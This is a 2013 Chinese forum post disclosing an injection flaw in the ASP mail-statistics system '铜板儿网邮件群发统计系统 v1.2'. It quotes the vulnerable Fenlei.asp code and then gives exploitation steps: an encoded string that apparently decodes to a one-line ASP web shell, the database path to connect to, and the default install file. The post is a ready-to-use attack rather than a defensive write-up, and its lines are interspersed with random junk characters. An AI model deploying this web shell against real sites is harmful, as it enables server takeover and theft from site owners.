找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1982|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
8 C# w1 }6 E- `
( v3 _$ d8 `( NIF Request.QueryString("Action")="del" Then ' ~1 p0 e0 q& Q5 F7 q3 m* q
ID=Request.QueryString("ID")
8 U2 Z- e; E6 iIF Countss ("tui","Fenlei",ID )<>0 then ; S& S  v% a0 O; \
'略
2 _7 N$ ]& U: \' y- [' g$ ^IF Request.QueryString("Action")="Add" Then ) b, Z: @- ^/ n' e$ u! z
Tname=Request.Form("Typename")
! k  W6 ~9 q, d2 FSet Rs=Server.CreateObject("adodb.Recordset")
' b0 h( J& i* T. ?( GSql="Select * From Fenlei Order by id Desc " - ?1 ^6 D- t2 K$ z% a/ c
Rs.Open Sql,Conn,1,3
$ u4 r8 Q% W3 ^) N/ vRs.Addnew , u. v" _, o3 P/ x
Rs("Typename")=Tname - }& Y! X& P+ n- F2 g# L" h
'略 $ J* U  x2 Y6 q) k7 Q& W- i9 {
Set Rs=Server.CreateObject("adodb.Recordset")
7 {2 i9 s1 E# n) p- CSql="Select * From Fenlei Order by id Desc "
- Y) a" s* V. Q; uRs.Open Sql,Conn,1,1 " A2 _. F8 J; T7 p( J* [* {
'略 % Z/ M- V; [( b/ M: ^. @6 c+ N& L
%>7 }  j( V* I0 h2 G" j* p
) q" f% M4 N+ z' ~5 S/ t
4 U# o3 t- E  s# w9 I
9 y* K+ g* K- f2 b9 K! w
没有过滤,直接写入数据库。, Z2 O+ p. B) G# q+ O( @* p2 w. `- T

0 K7 h# T$ |1 E利用方法:! I2 }5 e: _) d. S

3 U: J9 n* G6 F+ r$ z6 t插入:┼攠數畣整爠煥敵瑳∨≡┩>
1 k/ z0 R# K5 P) S7 N3 b2 o ! o) K4 F. r6 h7 S+ O
  k% Z4 P, P" P: I  C
连接: http://www.xxx.com/###tongbaner.asa - U6 y6 _( s. S& I$ U: Z/ H
'默认安装文件:
: h0 @+ P# C# f, a( J( H'install.asp9 i& d! r& Z& p! f- J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表